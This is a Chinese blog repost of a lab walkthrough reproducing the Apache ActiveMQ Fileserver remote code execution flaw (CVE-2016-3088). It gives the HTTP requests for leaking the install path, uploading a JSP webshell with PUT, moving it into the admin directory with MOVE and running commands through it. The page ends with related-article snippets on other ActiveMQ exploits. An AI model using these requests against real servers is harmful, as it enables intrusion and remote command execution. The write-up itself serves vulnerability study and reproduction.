【漏洞预警】Apache ActiveMQ Fileserver远程代码执行漏洞(CVE-2016-3088)

最新推荐文章于 2024-05-02 10:22:48 发布
最新推荐文章于 2024-05-02 10:22:48 发布
阅读量322 收藏 1
点赞数
文章标签: python 操作系统
原文链接:http://www.cnblogs.com/wh4am1/p/7749472.html
版权

漏洞编码:CVE-2016-3088

实验环境:Linux

Apache ActiveMQ版本号:Apache ActiveMQ 5.7.0

---------------------------------------------------------------------

首先下载安装包

wget http://archive.apache.org/dist/activemq/apache-activemq/5.7.0/apache-activemq-5.7.0-bin.tar.gz

解压后打开bin目录

启动apache activemq

./activemq start

检验是否运行

netstat -an | grep 61616

如果61616端口开放了就说明运行成功。

然后进入http://xxx.xxx.xxx.xxx:8161/

 

漏洞利用

1、 获取物理路径

PUT /fileserver/%20/%20 HTTP/1.1

 

发送数据包

2、再利用PUT上传一个Jsp的马到 fileserver 目录

PUT /fileserver/1.jsp HTTP/1.1

 

遇到这种情况不用担心,只是该目录没有执行的权限罢了。

解决方法看漏洞三

3、利用 MOVE 方法将 Webshell 移入 admin/ 目录(也可以利用相对路径)

MOVE /fileserver/1.jsp  HTTP/1.0
Destination:file:///root/apache-activemq-5.7.0/webapps/admin/1.jsp

 

然后访问http://xxx.xxx.xxx.xxx:8161/admin/1.jsp?cmd=id

成功执行了命令

 

漏洞原文:https://www.seebug.org/vuldb/ssvid-96268

转载于:https://www.cnblogs.com/wh4am1/p/7749472.html

weixin_30629977
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ActiveMQ 反序列化漏洞CVE-2015-5254)利用工具
08-15
CVE-2015-5254的严重性在于,攻击者不需要拥有系统的任何权限,仅通过网络发送恶意消息就可能导致远程代码执行。 这个漏洞主要影响ActiveMQ 5.9.x至5.13.3版本。为了利用这个漏洞,攻击者需要向受害者的ActiveMQ...
Apache ActiveMQ 远程代码执行漏洞 (CVE-2016-3088)复现
chenming08的博客
04-27 809
4、进入ActiveMQ :http://your-ip:8161/admin/test/systemProperties.jsp(攻击机)7、然后将上传的webshell移到/opt/activemq/webapps/api/1.jsp。10、使用命令执行http://X.X.X.X:8161/api/1.jsp?1、进入环境cd activemq/CVE-2016-3088/(靶机)上传webshell到/fileserver/1.txt(攻击机)6、查看/fileserver/1.txt。
CVE-2020-11998 —— Apache ActiveMQ 远程代码执行漏洞
战神/calmness的博客
12-10 1223
目录 Apache ActiveMQ 组件介绍 描述 影响版本 过程 修复建议 CVE-2020-11998 | Apache ActiveMQ 远程代码执行漏洞 Apache ActiveMQ 组件介绍 Apache ActiveMQApache软件基金会所研发的开放源代码消息中间件;由于ActiveMQ是一个纯Java程序,因此只需要操作系统支持Java虚拟机,ActiveMQ便可执行。 描述 9月10日Apache软件基金会发布安全公告,修复了Apache Active.
ActiveMQ 反序列化漏洞 (CVE-2015-5254)
swordheart的博客
01-18 723
漏洞简介 Apache ActiveMQ 是由美国 Pachitea(Apache)软件基金会开发的开源消息中间件,支持 Java 消息服务、集群、Spring 框架等。 Apache ActiveMQ 5.x版本之前的5.13.0安全漏洞,该程序造成的漏洞不限制代理中可以序列化的类。远程攻击者可以制作一个特殊的序列化Java Message Service (JMS) ObjectMessage 对象,利用该漏洞执行任意代码漏洞环境 Docker -compose up -d 运行环
ActiveMQ远程代码执行漏洞(CVE-2016-3088)
weixin_44047654的博客
11-25 3017
ActiveMQ远程代码执行漏洞(CVE-2016-3088)
Apache ActiveMQ 远程代码执行漏洞CVE-2016-3088)复现及排查
dayouzi的博客
08-14 2348
ActiveMQ的web控制台分三个应用,admin、api和fileserver,其中admin是管理员页面,api是接口,fileserver是储存文件的接口;admin和api都需要登录后才能使用,fileserver无需登录。所以,ActiveMQ在5.12.x~5.13.x版本中,已经默认关闭了fileserver这个应用(你可以在conf/jetty.xml中开启之);在5.14.0版本以后,彻底删除了fileserver应用。
apache-activemq-5.0.0-src.zip_ActiveMQ代码_activemq_activemq.src
09-20
这个压缩包`apache-activemq-5.0.0-src.zip`包含了ActiveMQ 5.0.0版本的源代码,对于开发者来说,这是一个深入理解其工作原理、定制功能或进行二次开发的重要资源。 源代码分析是理解软件设计思想和技术实现的关键...
apache-activemq-5.16.5
12-27
标题"apache-activemq-5.16.5"指的是该软件的一个特定版本,即5.16.5版本,通常每个新版本都会包含错误修复、性能提升以及新功能的添加。 描述中提到"启动要求jdk版本8+", 这意味着在运行Apache ActiveMQ 5.16.5...
ActiveMQ反序列化漏洞CVE-2015-5254) 漏洞利用工具
11-25
ActiveMQ反序列化漏洞CVE-2015-5254)漏洞利用工具,说明文档已存在请进行查看
apache-activemq-5.17.3
12-27
这个名为"apache-activemq-5.17.3"的压缩包包含了ActiveMQ的5.17.3版本,这是一个稳定且功能丰富的发布版本。在深入探讨其具体内容之前,我们首先需要了解ActiveMQ的基本概念以及它与Java开发环境的关系。 ActiveMQ...
Apache ActiveMQ RCE漏洞复现(CVE-2023-46604)
0xSec
10-26 8102
ActiveMQ是一个开源的消息代理和集成模式服务器,它支持Java消息服务(JMS) API。它是Apache Software Foundation下的一个项目,用于实现消息中间件,帮助不同的应用程序或系统之间进行通信。Apache ActiveMQ 中存在远程代码执行漏洞Apache ActiveMQ在默认安装下开放了61616服务端口,而该端口并没有对传入数据进行适当的过滤,从而使攻击者能够构造恶意数据以实现远程代码执行
ActiveMQ 反序列化漏洞CVE-2015-5254)
zzzzz1284的博客
01-04 129
CVE-2015-5254
Apache ActiveMQ Fileserver远程代码执行漏洞(CVE-2016-3088)
maverickpig的博客
07-01 709
Apache ActiveMQ Fileserver远程代码执行漏洞(CVE-2016-3088) 本文来源于vulhub漏洞库,为本人复现笔记,如有侵权可联系我删除* 该漏洞工作中遇到过几次,记个笔记先 漏洞详情 ActiveMQ的web控制台分三个应用,admin、api和fileserver,其中admin是管理员页面,api是接口,fileserver是储存文件的接口;admin和api都需要登录后才能使用,fileserver无需登录。 fileserver是一个RESTful API接口,我们可
然之协同系统迁移到SAE平台-细节排查
chujilu1991的专栏
08-29 910
然之系统基本能在SAE平台正常运行
Apache ActiveMQ Fileserver远程代码执行漏洞复现(CVE-2016-3088)
Alluresec的博客
11-20 727
Apache ActiveMQ Fileserver远程代码执行漏洞复现(CVE-2016-3088) 0X00简介 Apache ActiveMQApache软件基金会所研发的开放源代码消息中间件;由于ActiveMQ是一个纯Java程序,因此只需要操作系统支持Java虚拟机,ActiveMQ便可执行。 0X01漏洞概述 ActiveMQ的web控制台分三个应用,分别是admin、api和fi...
文件上传漏洞--ctfer
m0_62202418的博客
11-25 450
启动靶场环境,访问80 端口 尝试上传一句话木马1.php 提示进允许上传这四种文件 应该是进行了白名单过滤 查看一下源代码 如果上传的文件是zip 类型的文件,则会对该文件进行解压 如果是其他三种类型,则会直接上传文件 所以此处只能上传zip 压缩包 将1.php 压缩成1.zip 尝试上传 zip 1.zip 1.php 尝试上传一下 提示压缩包内不能有php 文件 继续查看源代码 此处使用Pclzip 将传过来的文件进行解压 然后做了
CVE-2017-15709)ActiveMQ 信息泄漏漏洞 0day 漏洞复现
大壮
12-26 500
CVE-2017-15709)ActiveMQ 信息泄漏漏洞 0day 漏洞复现
ActiveMQ任意文件写入漏洞(CVE-2016-3088)
最新发布
m0_74402888的博客
05-02 1919
漏洞出现在 fileserver 应用中,漏洞原理是 fileserver 支持写入文件(但不解析 jsp),同时支持移动文件(MOVE 请求)。所以我们只需写入一个文件,然后使用 MOVE 请求将其移动到任意位置,造成任意文件写入漏洞。写入文件方法写入 webshell写入 cron 或 ssh key 等文件写入 jar 或 jetty.xml 等库和配置文件。
cve-2016-3088
07-27
- *1* *2* [ActiveMQ远程代码执行漏洞(CVE-2016-3088)](https://blog.csdn.net/weixin_44047654/article/details/128033455)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值